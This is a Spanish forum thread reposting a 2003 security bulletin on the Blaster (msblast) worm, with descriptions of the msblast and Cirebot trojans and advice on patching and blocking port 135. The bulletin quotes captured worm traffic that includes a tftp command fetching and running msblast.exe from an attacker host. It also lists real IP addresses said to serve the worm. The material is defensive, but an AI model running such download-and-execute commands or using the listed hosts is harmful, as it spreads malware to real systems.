Nuevos gusanos de propagación masiva

Estado
Cerrado para nuevas respuestas

jbex

El que peca y reza empata
Administrador
#1
Hemos empezado a recibir informes de un nuevo gusano que se está empezando a propagar. Utiliza la reciente vulnerabilidad descubierta en el mecanismo RPC de todas las versiones de Windows. En el momento de redactar este boletín de urgencia todavía no se conoce en detalle el funcionamiento del gusano, ya que todavía está siendo analizado. Uno de los efectos de este gusano es que provoca al reinicio del ordenador infectado cada pocos minutos. A pesar de no disponer de muchos datos acerca del mismo, hemos decidido publicar este boletín para advertir atodos los lectores de 'una-al-día' sobre su existencia así como indicar las medidas necesarias a tomar para evitar su propagación.

El gusano realiza un barrido de las direcciones IP con el objeto de

identificar los sistemas Windows vulnerables (sistemas con el puerto135/tcp accesible). Cuando detecta la existencia de un sistema vulnerable, utiliza la vulnerabilidad RPC para abrir una sesión del intérprete de órdenes accesible de forma remota a través del puerto4444/tcp.

Dentro de esta sesión, procede a descargar mediante tftp el código binario de gusano. Este es el tráfico capturado de una máquina infectada:
Insertar CODE, HTML o PHP:
-------------tráfico 4444/tcp----------

tftp -i aaa.bbb.ccc.ddd GET msblast.exe

start msblast.exe

msblast.exe

HTTP/1.0 403 Forbidden

Server: AdSubtract 2.50

Content-Type: text/html;charset=utf-8

Content-Length: 349

<html>

<head>

<meta http-equiv="Pragma" content="no-cache">

<meta http-equiv="Content-Type" content="text/html;charset=utf-8">

<title>Forbidden</title>

</head>

<body>

<h1>Forbidden</h1>

<h2>Requests from host hostname.of.attacking.host/aaa.bbb.ccc.ddd not

allowed; only requests from localhost (127.0.0.1) are allowed.

</h2>

</body></html>

-------------tráfico 4444/tcp----------

mblast.exe es un archivo ejecutable de Windows, comprimido y que ocupa 6KB. Su hash MD5 es

MD5sum packed: 5ae700c1dffb00cef492844a4db6cd69 (6176 Bytes)

La descarga del mismo puede realizarse contra uno de estos servidores tftp:

204.210.57.87

217.211.179.193

24.147.64.171

24.147.64.205

24.147.64.208

24.147.65.146

24.147.65.45

24.147.65.9

61.254.65.159

67.119.36.219

68.112.65.38

68.166.102.136

68.166.107.21

68.166.111.175

68.166.120.34

68.166.121.135

68.166.123.4

68.166.124.186

68.166.124.93

68.166.139.155

68.166.139.210

68.166.141.66

68.166.142.194

68.166.142.215

68.166.36.178

68.166.56.123

68.166.60.51

68.166.98.3
El gusano crea una entrada en el registro de Windows para ejecutarse automáticamente cada vez que se arranca el sistema:HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun"windows auto update"="msblast.exe"

Más vale prevenir que curar

Para evitar la entrada del gusano, es importante verificar estos dos aspectos clave:

1. Impedir las conexiones al puerto 135/tcp procedente de redes inseguras, como puede ser Internet.
2. Verificar que se ha aplicado la actualización publicada por Microsoft

para eliminar la vulnerabilidad RPC. Esta actualización está disponible a través del servicio Windows Update o bien descargando la actualización específica (ver el "una-al-día" del pasado 18 de julio para las URL de la actualización para cada versión de Windows).

Eliminación del virus

Los diferentes fabricantes de productos antivirus están en estos

momentos analizando el gusano y es de esperar que en pocos minutos dispongan de actualizaciones que permitan eliminarlo. Aconsejamos a todos los lectores de 'una-al-día' que procedan a realizar una actualización del archivo de firmas de su programa antivirus y, a continuación, una verificación integral de su ordenador.

© 2003 Hispasec

Troj/Msblast, I-worm.Lovsan

Msblast es un destructivo gusano troyano/backdoor reportado el 12 de Agosto del 2003, que aprovecha la vulnerabilidad del DCOM RPC (Llamada Remota de Procedimientos).
Infecta los sistemas con el archivo msblast.exe de 6 KB de extensión a través del puerto TCP 135, se conecta y envía instrucciones vía los puertos TCP 4444 y UDP 69.
Una vez ingresado a un sistema, el hacker ejecutará un serie de acciones, ocasionando una ataque de Negación de Servicio que colapsará los sistemas infectados.
La vulnerabilidad RPC (Remote Procedure Call) fue reportada por el grupo de investigadores de origen polaco denominado The Last Stage of Delirium, quienes han descubierto gran parte de las últimas fallas de Windows e Internet Explorer.
Este troyano es un PE (Portable Ejecutable) e infecta Windows 95/98/NT/Me/2000/XP, incluyendo los servidores NT/2000/Server 2003
Sus payloads son los siguientes:
Ingresa a través del puerto 135 aprovechando la vulnerabilidad RPC de Microsoft.
Captura información de la configuración del servidor y de las estaciones de trabajo.
Tambien se conecta vía el puerto TCP 4444.
Recibe instrucciones vía el puerto UDP 69.
Puede controlar remotamente archivos y programas de los sistemas infectados.
Ocasiona una Negación de Servicio (Denial of Service) colapsando al sistema.
Para una completa información visite este enlace:http://www.perantivirus.com/sosvirus/virufamo/msblast.htm

Troj/Cirebot

Cirebot es un peligroso y complejo y destructivo troyano/backdoor reportado el 03 de Agosto del 2003, que aprovechando la vulnerabilidad del DCOM RCP (Llamada Remota de Procedimientos), infecta los sistemas con el archivo worm.exe (dropper) de 111 KB de extensión a través del puerto 57005 y envía instrucciones vía el IRC (Internet Chat Relay) y el ICQ.
Una vez ingresado a un sistema, el hacker poseedor del software Cliente tomará el control remoto del sistema infectado, robando información y ejecutando una variedad de acciones y estragos.
Es un PE (Portable Ejecutable) e infecta Windows 95/98/NT/Me/2000/XP, incluyendo los servidores NT/2000/Server 2003
Sus payloads son los siguientes:
Aprovecha la vulnerabilidad RCP de MS.
Envía la información al hacker a través del ICQ
También puede enviar comandos a través del Chat.
Captura información de la configuración del servidor y de las estaciones de trabajo.
Captura teclas digitadas por el usuario.
Roba claves de acceso y números de tarjetas de crédito.
Descarga y ejecuta otros archivos.
Termina procesos en ejecución.
Puede bloquear el sistema borrando los recursos compartidos en una red local.
Controla remotamente los archivos y programas de los sistemas infectados.
Ataca otros sistemas usando varias vulnerabilidades.
Borra archivos y formatea el disco duro.
Para una completa información visite este enlace: http://www.perantivirus.com/sosvirus/virufamo/cirebot.htm
 
J

JAROCHO

Guest
#2
sabes soy nuevo es esto pero quisiera sabes como saber ip mediante MSN creo que ese invento es tuyo
 

PeReGriNo

Nuevo Miembro
Miembro
#3
excelente info Jbex, pensé que nada mas ese gusano iba a afectar a los w2000 y Xp, ahorita mismo me bajo el parche antes de que algo pase, de nuevo gracias Jbex.

saludos...
 
Estado
Cerrado para nuevas respuestas
Arriba Pie